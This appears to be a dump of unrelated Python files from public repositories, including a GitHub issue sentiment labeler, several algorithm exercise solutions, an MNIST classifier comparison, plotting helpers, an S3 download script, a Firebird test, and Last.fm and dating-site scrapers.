sys.exit("Error from sentimentanalysis")
sys.stderr.write("Json Response to Sever:\n" + str(res.json()) + "\n")
    positive_threshold = os.getenv("positive_threshold", "0.2")
polarity = res.json()['polarity']
# Call back to Github to apply the label.
apply_label(polarity,
payload["issue"]["number"],
payload["repository"]["full_name"],
positive_threshold)
return "Repo: %s, issue: %s, polarity: %f" % (payload["repository"]["full_name"], payload["issue"]["number"], polarity)
def apply_label(polarity, issue_number, repo, positive_threshold):
sys.stderr.write("->apply_label() polarity: %f issue# %s Repo: %s Threshold: %s \n" % (polarity, issue_number, repo, positive_threshold))
g = Github(os.getenv("auth_token"))
repo = g.get_repo(repo)
issue = repo.get_issue(issue_number)
has_label_positive = False
has_label_review = False
    for label in issue.labels:
        # issue.labels yields Label objects, so compare on the name attribute
        if label.name == "positive":
            has_label_positive = True
        if label.name == "review":
            has_label_review = True
    if polarity > float(positive_threshold) and not has_label_positive:
        issue.set_labels("positive")
        sys.stderr.write("Setting Positive Label\n")
    elif not has_label_review:
        issue.set_labels("review")
        sys.stderr.write("Setting Review Label\n")
| true |
52b0f51c044de8f7b47f895f3e8fcb8c78be7b59
|
Python
|
yskang/AlgorithmPractice
|
/baekjoon/python/teleport_station_18232.py
|
UTF-8
| 1,102 | 3.078125 | 3 |
[
"MIT"
] |
permissive
|
# Title: 텔레포트 정거장
# Link: https://www.acmicpc.net/problem/18232
import sys
from collections import deque, defaultdict
sys.setrecursionlimit(10 ** 6)
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(n: int, m: int, s: int, e: int, stations: list):
visited = defaultdict(lambda: False)
visited[0] = True
visited[n+1] = True
queue = deque()
queue.append((s, 0))
visited[s] = True
while queue:
station, time = queue.popleft()
for child in stations[station]:
if not visited[child]:
queue.append((child, time+1))
visited[child] = True
if child == e:
return time+1
def main():
n, m = read_list_int()
s, e = read_list_int()
stations = [[i-1, i+1] for i in range(n+1)]
for _ in range(m):
x, y = read_list_int()
stations[x].append(y)
stations[y].append(x)
print(solution(n, m, s, e, stations))
if __name__ == '__main__':
main()
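# Illustrative trace (my own example, not judge input): with n=5, m=1, s=1, e=5 and the extra
# teleport pair (2, 5), station 1 connects to [0, 2] and station 2 to [1, 3, 5], so the BFS
# reaches station 5 in 2 moves (1 -> 2 -> 5) and solution(...) returns 2.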
| true |
2a4c2a7bb90f0c55c24a875e95dd640fe99875f4
|
Python
|
MicherlaneSilva/ifpi-ads-algoritmos2020
|
/atividades/iteracao_WHILE/f3_q17_soma_inverso.py
|
UTF-8
| 636 | 4 | 4 |
[] |
no_license
|
def mostrar(cont_crescente, cont_decrescente, n):
if cont_crescente < n - 1:
print(f'{1}/{cont_decrescente} +', end = " ")
else:
print(f'{1}/{cont_decrescente} =')
def soma_inverso(n):
somatorio = 0
contador = 0
den = n
while contador < n:
somatorio += 1/ den
mostrar(contador, den, n)
contador += 1
den -= 1
return somatorio
def main():
print("SOMA DOS INVERSOS")
n = int(input('\nDigite o valor para N: '))
print("S =", end = " ")
print("\nS = %.2f"%soma_inverso(n))
main()
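# Illustrative check (my own example): for N = 3 the printed series is 1/3 + 1/2 + 1/1
# and soma_inverso(3) returns approximately 1.83.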
| true |
af4a5a78d5c2b01e89b02ce38f6dd5937126dcf9
|
Python
|
sunqianggg/alltools
|
/keras/mnist_mlp_compare.py
|
UTF-8
| 2,144 | 2.9375 | 3 |
[] |
no_license
|
#encoding:utf8
'''
compare NN to another classify approaches like (svm,regression).
'''
from keras.datasets import mnist
import numpy as np
from keras.utils import np_utils
from sklearn import svm
# the data, shuffled and split between train and test sets
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = X_train.reshape(60000, 784)
X_test = X_test.reshape(10000, 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
nb_classes = 10
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
def clf_svm():
Y_train_list=[list(item).index(1.0) for item in Y_train]
Y_test_list=[list(item).index(1.0) for item in Y_test]
clf=svm.SVC(decision_function_shape='ovo')
clf.fit(X_train,Y_train_list)
print(clf.score(X_test,Y_test_list))
def clf_nn():
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD, Adam, RMSprop
batch_size = 128
nb_epoch = 20
model = Sequential()
model.add(Dense(512, input_shape=(784,)))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
history = model.fit(X_train, Y_train,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
if __name__=="__main__":
for clf in (clf_nn,clf_svm):
print(clf.__name__)
from time import time
start=time()
clf()
end=time()
print(end-start)
| true |
cdf27515a22178fbe50a82245b34b24fa457a55f
|
Python
|
qcrew-lab/qcore
|
/codebase/datasaver/plot.py
|
UTF-8
| 2,276 | 2.96875 | 3 |
[] |
no_license
|
import numpy as np
import matplotlib.pyplot as plt
from IPython import display
from qcrew.codebase.analysis.fit import do_fit, eval_fit
def fit_analysis(data: dict, i_tag: str, q_tag: str, x: np.ndarray, fit_function: str) -> tuple:
if i_tag in data.keys():
last_avg_i = data[i_tag][-1]
else:
raise ValueError(f"No data for the tag {i_tag}")
if q_tag in data.keys():
last_avg_q = data[q_tag][-1]
else:
raise ValueError(f"No data for the tag {q_tag}")
signal = np.abs(last_avg_i + 1j * last_avg_q)
fit_params = do_fit(fit_function, x, signal) # get fit parameters
y_fit = eval_fit(fit_function, fit_params, x) # get fit values
return signal, y_fit, fit_params
def live_plot(ax, x, y, fit_y, yerr=None, fit_function=None):
    pass
def plot_fit(xs, ys, axis, yerr=None, fit_func="sine"):
if yerr is not None:
# Calculate average error throughout all datapoints
avg_yerr = np.average(yerr)
error_label = "average error = {:.3e}".format(avg_yerr)
axis.errorbar(
xs,
ys,
yerr=yerr,
marker="o",
ls="none",
markersize=3,
color="b",
label=error_label,
)
    params = do_fit(fit_func, xs, ys)
    fit_ys = eval_fit(fit_func, params, xs)
# Convert param values into conveniently formatted strings
param_val_list = [
key + " = {:.3e}".format(val.value) for key, val in params.items()
]
# Join list in a single block of text
label_text = "\n".join(param_val_list)
axis.plot(xs, fit_ys, color="m", lw=3, label=label_text)
# plt.xlabel("time clock")
# plt.ylabel("amps")
return params
class FakeLivePlotter:
def __init__(self):
self.fig = plt.figure()
self.ax = self.fig.add_subplot(1, 1, 1)
self.hdisplay = display.display("", display_id=True)
def plot(self, x, y, N: int = None, fit_func: str = None): # 2D plots only
""" """
self.ax.clear()
self.ax.plot(x, y) # plot data
if fit_func is not None:
plot_fit(x, y, self.ax, fit_func=fit_func) # plot fit
if N is not None:
self.ax.set_title(f"Rolling average after {N} reps")
self.hdisplay.update(self.fig) # update figure
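# Illustrative call (assumes a matplotlib Axes `ax` and that "sine" is a model name known to
# qcrew.codebase.analysis.fit):
#     params = plot_fit(xs, ys, ax, yerr=None, fit_func="sine")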
| true |
2635985781e149b307532f2e3834ea73c52fd497
|
Python
|
EwenFin/exercism_solutions
|
/python/robot-simulator/robot_simulator.py
|
UTF-8
| 1,101 | 3.890625 | 4 |
[] |
no_license
|
# Globals for the bearings
# Change the values as you see fit
EAST = 2
NORTH = 1
WEST = 4
SOUTH = 3
class Robot(object):
def __init__(self, bearing=NORTH, x=0, y=0):
self.bearing = bearing
self.x = x
self.y = y
@property
def coordinates(self):
return (self.x, self.y)
def turn_right(self):
if self.bearing == 4:
self.bearing = 1
else:
self.bearing = self.bearing + 1
def turn_left(self):
if self.bearing == 1:
self.bearing = 4
else:
self.bearing = self.bearing - 1
def advance(self):
if self.bearing == 1:
self.y +=1
elif self.bearing == 2:
self.x +=1
elif self.bearing == 3:
self.y -= 1
elif self.bearing == 4:
self.x -= 1
def simulate(self, string):
for char in string:
if char == 'L':
self.turn_left()
elif char == 'R':
self.turn_right()
elif char == 'A':
self.advance()
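# Illustrative usage sketch (my own example, separate from the exercise tests):
if __name__ == "__main__":
    robot = Robot(NORTH, 0, 0)
    robot.simulate("RAALAL")       # turn right, advance twice, turn left, advance, turn left
    print(robot.coordinates)       # expected: (2, 1)
    print(robot.bearing)           # expected: 4, i.e. WEST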
| true |
7d0d78d30dfabfe674540a300ce16a28811754e0
|
Python
|
epot/Domotic-prototype
|
/src/opennitoo/buscommand.py
|
UTF-8
| 506 | 2.734375 | 3 |
[] |
no_license
|
'''
Created on 22 janv. 2011
@author: epot
This module handles bus command messages
'''
class BusCommand():
'''
classdocs
'''
def __init__(self, who, what, where):
'''
Constructor
'''
self.who = who
self.what = what
self.where = where
def getMessage(self):
strMsg = "*" + str(self.who) + "*" + str(self.what) + "*" + str(self.where) + "##"
print "getMessage= \"" + strMsg + "\""
return strMsg
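# Illustrative usage (hypothetical who/what/where values, not taken from any device spec):
# BusCommand(1, 1, 11).getMessage() prints and returns the frame "*1*1*11##".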
| true |
b83bd2e0b72bea6f1700b73b41307432bbaca4ac
|
Python
|
jcrumpton/py-mcftracker
|
/test.py
|
UTF-8
| 1,113 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
"""
Copyright 2018 watanika, all rights reserved.
Licensed under the MIT license <LICENSE-MIT or
http://opensource.org/licenses/MIT>. This file may
not be copied, modified,or distributed except
according to those terms.
"""
import time
from mcftracker import MinCostFlowTracker
# Example usage of mcftracker
def main():
# Prepare initial detecton results, ground truth, and images
# You need to change below
detections = {"image_name": [x1, y1, x2, y2, score]}
tags = {"image_name": [x1, y1, x2, y2]}
images = {"image_name": numpy_image}
# Parameters
min_thresh = 0
P_enter = 0.1
P_exit = 0.1
beta = 0.5
fib_search = True
# Let's track them!
start = time.time()
tracker = MinCostFlowTracker(detections, tags, min_thresh, P_enter, P_exit, beta)
tracker.build_network(images)
optimal_flow, optimal_cost = tracker.run(fib=fib_search)
end = time.time()
print("Finished: {} sec".format(end - start))
print("Optimal number of flow: {}".format(optimal_flow))
print("Optimal cost: {}".format(optimal_cost))
print("Optimal flow:")
print(tracker.flow_dict)
if __name__ == "__main__":
main()
| true |
7abe2deb65bf33b9b5274969f5b9948f5c471515
|
Python
|
KlemenGrebovsek/cargo-stowage-optimization
|
/src/core/benchmark/benchmark.py
|
UTF-8
| 2,194 | 2.75 | 3 |
[
"MIT"
] |
permissive
|
import math
import numpy as np
from src.model.dataset import Dataset
from src.domain.cargo_space import CargoSpace
class BenchmarkC(object):
def __init__(self, dataset: Dataset):
self.Lower: int = 0
self.Upper: int = 1
self._dataset: Dataset = dataset
self._packages_by_station: list = [[] for _ in range(dataset.total_stations)]
# Sort packages by station of loading
for package in self._dataset.packages:
self._packages_by_station[package.station_in - 1].append(package)
def function(self):
def evaluate(d: int, sol: list) -> int:
total_package_movements, sol_index, total_lay_ds, total_we_ds = 0, 0, 0, 0
cargo_space = CargoSpace(width=self._dataset.width, height=self._dataset.height)
# Set column boundaries.
cargo_sp_col_sep = np.linspace(self.Lower, self.Upper, self._dataset.width + 1)
cargo_sp_col_sep[self._dataset.width] += 0.1
# Define package column positions via given solution.
for package in self._dataset.packages:
package.given_col_index = np.digitize(sol[sol_index], cargo_sp_col_sep) - 1
sol_index += 1
# Simulate ship route.
for station in range(1, self._dataset.total_stations + 1, 1):
summary = cargo_space.simulate_stop_at_station(station, self._packages_by_station[station - 1])
total_package_movements += summary.movements_sum
# Calculate layout and weight distribution in cargo space.
perfect_lay = round(sum(summary.lay_dist) / len(summary.lay_dist))
perfect_we = round(sum(summary.weight_dist) / len(summary.weight_dist))
for x in range(self._dataset.width):
total_lay_ds += abs(perfect_lay - summary.lay_dist[x])
total_we_ds += abs(perfect_we - summary.weight_dist[x])
# Return calculated fitness.
return int((total_package_movements * 5) + (total_lay_ds * 3) + (math.sqrt(total_we_ds)*3))
return evaluate
| true |
2c5569c99d54e1fa5aa523b6071862f237bc6334
|
Python
|
DemondLove/Python-Programming
|
/CodeFights/28. alphabetShift.py
|
UTF-8
| 951 | 4.53125 | 5 |
[] |
no_license
|
'''
Given a string, your task is to replace each of its characters by the next one in the English alphabet; i.e. replace a with b, replace b with c, etc (z would be replaced by a).
Example
For inputString = "crazy", the output should be alphabeticShift(inputString) = "dsbaz".
Input/Output
[execution time limit] 4 seconds (py3)
[input] string inputString
A non-empty string consisting of lowercase English characters.
Guaranteed constraints:
1 ≤ inputString.length ≤ 1000.
[output] string
The resulting string after replacing each of its characters.
'''
import string
def alphabeticShift(inputString):
alphabet = [x for x in string.ascii_lowercase]
inputString = [x for x in inputString]
for i in range(len(inputString)):
alpha = alphabet.index(inputString[i])
if alpha == 25:
inputString[i] = 'a'
else:
inputString[i] = alphabet[alpha+1]
return ''.join(inputString)
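# Quick illustrative check mirroring the example from the prompt:
print(alphabeticShift("crazy"))  # expected: "dsbaz"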
| true |
581d9ec7fbbba9654e2661d6feac9c2f979319f9
|
Python
|
brauliotegui/SPICED
|
/Week_10/flask-app/recommender.py
|
UTF-8
| 2,703 | 2.90625 | 3 |
[] |
no_license
|
"""Machine-Learning Code that returns movie recommendations"""
import numpy as np
from sklearn.decomposition import NMF
from sklearn.metrics.pairwise import cosine_similarity
import pandas as pd
import pickle5 as pickle
MOVIES = pd.read_csv('ml-latest-small/movies.csv')
RATINGS = pd.read_csv('ml-latest-small/ratings.csv')
DF = pd.merge(RATINGS, MOVIES, left_on='movieId', right_on='movieId')
MIDS = RATINGS['movieId'].unique()
MIDS = pd.DataFrame(MIDS)
MOVIES_DF = pd.merge(MIDS, MOVIES, left_on=0, right_on='movieId')
# better:
with open("nmf_model.pkl", 'rb') as file:
m = pickle.load(file)
P = m.components_
def calculate_best_movies(result_html):
    '''Fit an NMF user profile from the submitted ratings and return the top-5 recommended titles.'''
column_names = ['title', 'rating']
user_input = pd.DataFrame(result_html, columns=column_names)
r_true = DF.pivot(index='userId', columns='movieId', values='rating')
r_true.fillna(2.5, inplace=True)
m = NMF(max_iter=500, n_components=21)
m.fit(r_true)
P = m.components_
user_ratings = pd.merge(MOVIES_DF, user_input, left_on='title', right_on='title', how='left')
new_user = user_ratings['rating'].fillna(2.5)
new_u = np.array(new_user).reshape(1, -1)
profile = m.transform(new_u)
result = np.dot(profile, P)
MOVIES_DF['recom'] = result.T
result = MOVIES_DF.sort_values('recom', ascending=False)['title'].head(5)
return result
def similar_users_recommender(result_html):
''' doc '''
column_names = ['title', 'rating']
user_input = pd.DataFrame(result_html, columns=column_names)
user_ratings = pd.merge(MOVIES_DF, user_input, left_on='title', right_on='title', how='left')
query = user_ratings['rating']
query = np.array(query)
m_matrix = DF.pivot_table(values='rating', index='userId', columns='movieId')
m_matrix.loc['e'] = query
m_matrix = m_matrix.sub(m_matrix.mean(axis=0), axis=1)
m_matrix.fillna(0, inplace=True)
cosim = cosine_similarity(m_matrix)[-1]
cosim = pd.DataFrame(cosim)
top10 = cosim.sort_values(by=[0], ascending=[False]).head(11) #order by most similar users
similar_users = list(top10.index)
similar_users = similar_users[1:]
users_r = m_matrix.loc[similar_users, :]
movie_ratings_avg = users_r.mean()
movie_ratings_avg = pd.DataFrame(movie_ratings_avg)
rec_movies = movie_ratings_avg.sort_values(by=[0], ascending=[False]).head(10)
rec_movies = pd.merge(rec_movies, MOVIES, left_on='movieId', right_on='movieId', how='left')
result = rec_movies['title']
return result
def movieId_to_title(ids):
''' Given a list of movieIds, returns a corresponding list of movie titles.'''
return MOVIES.set_index('movieId').loc[ids]['title'].tolist()
| true |
1124f53f4cfc8b811e067349cc49078d1ad65549
|
Python
|
n0thing233/n0thing233.github.io
|
/noodlewhale/amazon/VO/algorithm/207. Course Schedule.py
|
UTF-8
| 1,025 | 3.265625 | 3 |
[] |
no_license
|
# Solved bug-free on the first attempt.
# Topological sort: push every node with indegree 0 onto the queue, pop and decrement its
# neighbours' indegrees; if any node is never processed the courses cannot all be finished,
# otherwise they can.
# time: O(V+E)
# space: O(V+E)
from typing import List
from collections import deque, defaultdict
class Solution:
    def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
neighbors = defaultdict(list)
for i in prerequisites:
neighbors[i[1]].append(i[0])
indegree = [0]*numCourses
for i in range(numCourses):
if i not in neighbors:
neighbors[i] = []
for j in neighbors[i]:
indegree[j] += 1
queue = deque()
for i,j in enumerate(indegree):
if j == 0:
queue.append(i)
num_res = numCourses
while queue:
curr = queue.popleft()
num_res -= 1
for i in neighbors[curr]:
indegree[i] -= 1
if indegree[i] == 0:
queue.append(i)
return True if num_res == 0 else False
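# Illustrative usage (my own example, outside the LeetCode harness):
if __name__ == "__main__":
    print(Solution().canFinish(2, [[1, 0]]))          # expected: True (take 0, then 1)
    print(Solution().canFinish(2, [[1, 0], [0, 1]]))  # expected: False (circular dependency)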
| true |
7a443ab3885153c224a1135267315dd9f369c94c
|
Python
|
chris-0511/crawler
|
/Dating_software.py
|
UTF-8
| 866 | 2.765625 | 3 |
[] |
no_license
|
# ch23_3.py
import requests
import csv
def get_data(page):
url = 'http://www.lovewzly.com/api/user/pc/list/search?'
form_data = {'gender':'2', 'mary':'1', 'page':'1'}
    # pass the query parameters
    form_data['page']=page
    datahtml = requests.get(url, params=form_data)
    datas = datahtml.json()
    nickname,bir,education,height,city,picurl=[],[],[],[],[],[]
    data = datas['data']['list']
    for d in data:
        nickname.append(d['username'])
        print('Nickname:',d['username'])
        bir.append(d['birthdayyear'])
        print('Birth year:',d['birthdayyear'])
        height.append(d['height'])
        print('Height:',d['height'])
        city.append(d['city'])
        print('City:',d['city'])
    print('The above is page %s -----------------------------------------------------'%(page))
for i in range(1,11):
get_data(i)
| true |
a38302f284a9844f2ae458e6f9ace69b15d012d0
|
Python
|
sbridgens/Basic_Scripts_Collection
|
/Test_BOTO_S3Downloader.py
|
UTF-8
| 745 | 2.828125 | 3 |
[] |
no_license
|
#!/usr/local/bin/python2.7
import os
import boto3
import sys
s3bucket='SomeBucket'
s3basekey='SomeKey'
s3asset=sys.argv[1]
def Download_From_S3():
try:
session = boto3.Session(profile_name='s3prod')
dl_client = session.client('s3')
print("[+] Attempting download of s3 media file")
dl_client.download_file(Bucket=s3bucket,
                                Key=s3basekey + s3asset,
Filename=s3asset)
print("[+] Successfully downloaded s3 media file: %s" % s3asset)
return "Success"
except Exception as ds3_ex:
print("[-] Error Downloading media from S3, Error message: {0}".format(ds3_ex))
Download_From_S3()
| true |
b31e8a7cf46c0c4f459acd81f32f4c2ac930e462
|
Python
|
FirebirdSQL/firebird-qa
|
/tests/bugs/core_3314_test.py
|
UTF-8
| 922 | 2.546875 | 3 |
[
"MIT"
] |
permissive
|
#coding:utf-8
"""
ID: issue-3681
ISSUE: 3681
TITLE: Dependencies are not removed after dropping the procedure and the table it
depends on in the same transaction
DESCRIPTION:
JIRA: CORE-3314
FBTEST: bugs.core_3314
"""
import pytest
from firebird.qa import *
init_script = """create table t (a int);
SET TERM !!;
create procedure p as begin delete from t; end!!
SET TERM !!;
commit;
"""
db = db_factory(init=init_script)
test_script = """SELECT 1 FROM RDB$DEPENDENCIES WHERE RDB$DEPENDED_ON_NAME='T';
drop procedure p;
drop table t;
commit;
SELECT 1 FROM RDB$DEPENDENCIES WHERE RDB$DEPENDED_ON_NAME='T';
"""
act = isql_act('db', test_script)
expected_stdout = """
CONSTANT
============
1
"""
@pytest.mark.version('>=3')
def test_1(act: Action):
act.expected_stdout = expected_stdout
act.execute()
assert act.clean_stdout == act.clean_expected_stdout
| true |
b4776ae7c617a8cff2fb00b39571bd25b8ddb986
|
Python
|
PushkrajSonalkar/Python11-07-2019
|
/sets_prog/ex1.py
|
UTF-8
| 915 | 4.625 | 5 |
[] |
no_license
|
# creating a set
# Python program to demonstrate
# Creation of Set in Python
# Creating a Set
set1 = set()
print "Initial blank set\n", set1
# Creating a Set with
# the use of a String
set2 = set("Arnav")
print "\nSet with use of String:", set2
# Creating a Set with
# the use of a List
set3 = set(["Arnav", "Ravindra", "Sonalkar"])
print "\nSet with use of List: ", set3
# Creating a Set with
# a List of Numbers
# (Having duplicate values)
set4 = set([1, 2, 4, 4, 3, 3, 3, 6, 5])
print "\nSet with use of List of Numbers: ", set4
# Creating a Set with
# a mixed type of values
# (Having numbers and strings)
set5 = set([1, 2, "Arnav", 4, "Ravindra", 5, "Sonalkar"])
print "\nSet with use of mixed vales: ", set5
# Copy a set
set6 = set2.copy()
print "\nCopied Set: ", set6
# issubset()
print set2.issubset(set6)
# intersection
print set2.intersection(set6)
# max
print max(set4)
# min
print min(set4)
| true |
cb0600bf47a369b59cf0f18c0f9e84fc8c02c0be
|
Python
|
High-Bee/TIL
|
/Chatbot/python-recap-master/백준.py
|
UTF-8
| 1,641 | 3.984375 | 4 |
[] |
no_license
|
# Problem
# N integers are given. Write a program that finds their minimum and maximum values.
# Input
# The first line contains the number of integers N (1 ≤ N ≤ 1,000,000). The second line contains the N integers separated by spaces.
# Every integer is greater than or equal to -1,000,000 and less than or equal to 1,000,000.
# Output
# On the first line, print the minimum and the maximum of the N given integers, separated by a space.
# Sample input 1
# 5
# 20 10 35 30 7
# Sample output 1
# 7 35
import sys
# n = int(input())
# a = [sys.stdin.readline() for i in range(n)]
# a = [20, 10, 35, 30, 7]
n = int(input())
a = list(map(int, sys.stdin.readline().split()))
print(min(a), max(a))
# Problem
# Given 9 distinct natural numbers, write a program that finds the maximum among them and
# the position (counted from 1) at which that maximum appears.
# For example, given the 9 distinct natural numbers
# 3, 29, 38, 12, 57, 74, 40, 85, 61
# the maximum is 85 and it is the 8th number.
# Input
# One natural number is given per line, from the first line to the ninth line. Every given
# natural number is less than 100.
# Output
# Print the maximum on the first line, and on the second line print the position of the maximum.
# Sample input 1
# 3
# 29
# 38
# 12
# 57
# 74
# 40
# 85
# 61
# Sample output 1
# 85
# 8
| true |
98bea716038dd2e5db3c2fb69b4730cb60c3d20d
|
Python
|
suitengu/recenh
|
/app/routes.py
|
UTF-8
| 4,414 | 2.65625 | 3 |
[] |
no_license
|
import json
import os
import requests
from app import app
from app.forms import UsernameForm
from flask import Flask, flash, request, redirect, url_for, abort
from flask import send_from_directory
from flask import render_template
from werkzeug.utils import secure_filename
from bs4 import BeautifulSoup
HEADERS = {
'UserAgent': 'LastFM Recommendations Enhanced Tool',
'From': 'kingzoloft@gmail.com'
}
LFM_API_URL = 'https://ws.audioscrobbler.com/2.0/'
@app.route('/', methods=['GET', 'POST'])
def index():
form = UsernameForm()
if form.validate_on_submit():
flash('wtf does flash do?')
return redirect(url_for('get_recs', username=form.username.data))
return render_template('index.html', form=form)
@app.route('/recs/<username>')
def get_recs(username: str, use_followers=False, use_neighbours=True):
neighbours_list = []
following_list = []
if use_followers:
# get all users the user follows
following_list = get_following(username)
if use_neighbours:
# get all the user's neighbours
neighbours_list = get_neighbours(username)
user_list = list(set().union(following_list, neighbours_list))
# get top artists from each of them
user_top_artists = {}
for user in user_list:
user_top_artists[user] = get_top_artists(user, 15)
merged_artist_list = list(set().union(*list(user_top_artists.values())))
user_artist_list = get_top_artists(username, limit=None)
# subtract user top artists from the list, though the 'long tail' is still
# left and has to be dealt with shittily
recs_list = list(set(merged_artist_list).difference(set(user_artist_list)))
return render_template('recs.html', recs=recs_list)
def get_following(username: str) -> list:
"""
Get the list of users the specified user follows
@param username -- the username whose following list we will get
@return list of the following usernames
"""
endpoint_url = '{}?method=user.getfriends&user={}&api_key={}&format=json'.format(LFM_API_URL,
username, app.config['LFM_API_KEY'])
lfm_res = requests.get(endpoint_url, headers=HEADERS)
if not lfm_res.ok:
        abort(502, 'idk, something went wrong')
lfm_res_dict = json.loads(lfm_res.text)
following_list = [user['name'] for user in lfm_res_dict['friends']['user']]
return following_list
def get_neighbours(username: str) -> list:
"""
Get the list of users who are neighbours of the specified user
@param username -- the username whose neighbours we will get
@return list of the neighbours' usernames
"""
url = 'https://www.last.fm/user/{}/neighbours'.format(username)
res = requests.get(url)
if res.status_code != requests.codes.ok:
        abort(502, 'request error')
# there's no API route for neighbours, good thing this isn't hard to do with
# CSS selectors!
soup = BeautifulSoup(res.text, 'html.parser')
user_link_list = soup.select('a.user-list-link')
user_list = [user_link.text for user_link in user_link_list]
return user_list
def get_top_artists(username, limit=8):
get_all = False
if limit is None:
limit = 1000
get_all = True
endpoint_url = '{}?method=user.gettopartists&user={}&limit={}&api_key={}&format=json'.format(LFM_API_URL,
username, limit, app.config['LFM_API_KEY'])
lfm_res = requests.get(endpoint_url, headers=HEADERS)
if not lfm_res.ok:
        abort(502, 'idk, something went wrong')
lfm_res_dict = json.loads(lfm_res.text)
artist_list = [artist['name'] for artist in lfm_res_dict['topartists']['artist']]
if not get_all:
return artist_list
else:
page_count = int(lfm_res_dict['topartists']['@attr']['totalPages'])
for page in range(2, page_count+1):
# TODO: do something about the long URL
endpoint_url = '{}?method=user.gettopartists&user={}&limit={}&page={}&api_key={}&format=json'.format(LFM_API_URL, username, limit, page, app.config['LFM_API_KEY'])
lfm_res = requests.get(endpoint_url, headers=HEADERS)
if not lfm_res.ok:
                abort(502, 'idk, something went wrong')
lfm_res_dict = json.loads(lfm_res.text)
artist_append_list = [artist['name'] for artist in lfm_res_dict['topartists']['artist']]
artist_list = artist_list + artist_append_list
return artist_list
| true |